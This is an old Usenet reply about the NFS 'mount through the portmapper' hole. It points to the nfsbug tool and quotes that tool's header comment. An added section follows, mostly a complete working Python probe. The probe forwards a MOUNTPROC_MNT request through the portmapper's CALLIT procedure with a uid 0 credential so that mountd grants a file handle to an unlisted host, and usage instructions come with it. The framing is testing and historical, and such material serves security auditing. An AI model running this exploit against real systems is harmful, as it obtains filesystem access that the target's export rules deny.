> I just read a post in comp.security.unix entitled "widespread security hole
> in exporting of filesystems" which claims there are ways to break into a
> system that has filesystems exported to itself.
>
> Does anyone know anything about this? The post said "the trick is to make
> RPC requests via the portmapper, in such a way that they appear to the mount
> daemon to be coming from within the host itself."
>
> The post mentions a program that is "out there" to exploit this hole. If
> anyone has any knowledge of this, could you please post instructions on how
> to test for this.

Yes, this knowledge is widespread. Pick up the following program, which shows
how to exploit this and other well known NFS problems. I have enclosed the
starting comment from the program at the end of this message.

Host ftp.cs.vu.nl
Location: /leendert
  FILE -rw-r--r--   7597  May 16 15:15  nfsbug.aix.patch
  FILE -r--r--r--   3478  May  4 12:12  nfsbug.hpux.patch
  FILE -r--r--r--  36023  May  3 19:51  nfsbug.shar

Steinar Haug, SINTEF RUNIT, University of Trondheim, NORWAY
Email: Steinar.Haug@runit.sintef.no

-----------------------------------

/*
 * nfsbug.c
 *
 * Test hosts for well known NFS problems/bugs. Among these tests are:
 * find world wide exportable file systems, determine whether the
 * export list really works, determine whether we can mount file systems
 * through the portmapper, try to guess file handles, exercise the
 * mknod bug, and the uid masking bug.
 *
 * Author:
 *      Leendert van Doorn, April 1994
 *
 * TODO:
 *      - close sockets (?)
 */
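The "mount file systems through the portmapper" test from the comment above, written out as an added example for this page; it is not code from nfsbug or from Steinar's message. It builds the request the quoted post describes: a MOUNTPROC_MNT call for mountd wrapped inside a PMAPPROC_CALLIT request to the portmapper on UDP port 111, so that the call mountd receives originates from the portmapper on the target itself rather than from the prober. The wire formats are taken from RFC 1057 (RPC v2, AUTH_UNIX) and RFC 1094 appendix A (mount v1, 32-byte file handles); the function names (mount_via_portmapper, parse_callit_reply, probe), the default uid 0 credential and the sample reply bytes in the usage below are my own assumptions, not anything the post or the program specifies.

```python
"""Probe for the "mount through the portmapper" item in the nfsbug comment.

Wraps a MOUNTPROC_MNT call for mountd (program 100005) inside a
PMAPPROC_CALLIT request to the portmapper (program 100000, procedure 5)
and decodes the forwarded reply.  Wire formats follow RFC 1057 (RPC v2,
AUTH_UNIX) and RFC 1094 appendix A (mount protocol v1, 32-byte handles).
Added example for this page; not part of nfsbug.
"""
import os
import socket
import struct

PMAP_PROG, PMAP_VERS, PMAPPROC_CALLIT = 100000, 2, 5
MOUNT_PROG, MOUNT_VERS, MOUNTPROC_MNT = 100005, 1, 1
RPC_CALL, RPC_REPLY, RPC_VERS = 0, 1, 2
AUTH_NULL, AUTH_UNIX = 0, 1
NFS2_FHSIZE = 32

def xdr_u32(v):
    return struct.pack(">I", v)

def xdr_opaque(data):
    """XDR variable-length opaque/string: length, bytes, pad to 4-byte boundary."""
    return xdr_u32(len(data)) + data + b"\0" * ((-len(data)) % 4)

def auth_unix(machine=b"localhost", uid=0, gid=0, gids=()):
    """AUTH_UNIX credential (RFC 1057 section 9.2): stamp, name, uid, gid, gids<>.
    Classic portmap copies the caller's credential into the call it forwards."""
    body = xdr_u32(0) + xdr_opaque(machine) + xdr_u32(uid) + xdr_u32(gid)
    body += xdr_u32(len(gids)) + b"".join(xdr_u32(g) for g in gids)
    return xdr_u32(AUTH_UNIX) + xdr_opaque(body)

def rpc_call(xid, prog, vers, proc, params, cred=None):
    """RPC CALL message: header, credential, null verifier, procedure arguments."""
    if cred is None:
        cred = xdr_u32(AUTH_NULL) + xdr_opaque(b"")
    hdr = b"".join(xdr_u32(v) for v in (xid, RPC_CALL, RPC_VERS, prog, vers, proc))
    return hdr + cred + xdr_u32(AUTH_NULL) + xdr_opaque(b"") + params

def mount_via_portmapper(xid, dirpath, uid=0):
    """MOUNTPROC_MNT for dirpath, carried as the opaque args of PMAPPROC_CALLIT.
    Sent to UDP port 111, so the request mountd receives comes from the
    portmapper on the target host itself rather than from the prober."""
    inner = b"".join(xdr_u32(v) for v in (MOUNT_PROG, MOUNT_VERS, MOUNTPROC_MNT))
    inner += xdr_opaque(xdr_opaque(dirpath))   # args<> holding dirpath string<>
    return rpc_call(xid, PMAP_PROG, PMAP_VERS, PMAPPROC_CALLIT, inner,
                    cred=auth_unix(uid=uid))

class XdrReader:
    """Minimal cursor over an XDR byte string."""
    def __init__(self, data):
        self.data, self.pos = data, 0
    def u32(self):
        (v,) = struct.unpack_from(">I", self.data, self.pos)
        self.pos += 4
        return v
    def fixed(self, n):
        v = self.data[self.pos:self.pos + n]
        if len(v) != n:
            raise ValueError("truncated XDR data")
        self.pos += n + (-n) % 4
        return v
    def opaque(self):
        return self.fixed(self.u32())

def parse_callit_reply(data, xid):
    """Decode the CALLIT reply as (mountd port, mount status, fhandle or None);
    None if the xid mismatches or the portmapper rejected the request."""
    r = XdrReader(data)
    if r.u32() != xid or r.u32() != RPC_REPLY or r.u32() != 0:  # 0 = MSG_ACCEPTED
        return None
    r.u32()                              # verifier flavor, ignored
    r.opaque()                           # verifier body, ignored
    if r.u32() != 0:                     # accept_stat: 0 = SUCCESS
        return None
    port = r.u32()
    res = XdrReader(r.opaque())          # mountd's fhstatus, nested as res<>
    status = res.u32()                   # 0 = mount granted, otherwise an errno
    fhandle = res.fixed(NFS2_FHSIZE) if status == 0 else None
    return port, status, fhandle

def probe(host, dirpath, uid=0, timeout=3.0):
    """Send the forwarded MNT request to host's portmapper; decode the answer."""
    xid = struct.unpack(">I", os.urandom(4))[0]
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(mount_via_portmapper(xid, dirpath.encode(), uid), (host, 111))
        data, _ = s.recvfrom(4096)
    return parse_callit_reply(data, xid)

if __name__ == "__main__":
    import sys
    host, path = sys.argv[1], sys.argv[2]
    try:
        result = probe(host, path)
    except socket.timeout:
        sys.exit("no reply: portmapper down, filtered, or forwarding refused")
    if result is None:
        print("portmapper rejected the CALLIT request")
    elif result[1] == 0:
        print("mountd on port %d granted %s via the portmapper, fh=%s"
              % (result[0], path, result[2].hex()))
    else:
        print("mountd on port %d refused %s: status %d" % (result[0], path, result[1]))
```

Run it as `python3 nfsprobe.py target /some/export` from a host that is not in the target's export list for that path (check with `showmount -e target` first). A status 0 reply with a file handle then means mountd honoured a mount it would have refused had it seen the real source address, which is the hole the quoted post describes; if the path is exported to the world anyway, the reply proves nothing about the portmapper and you are looking at the first test in the nfsbug list instead. Later portmappers (Wietse Venema's secure portmap and rpcbind after it) refuse to forward CALLIT requests to mountd, so on a fixed host a timeout or a rejected CALLIT is the expected outcome.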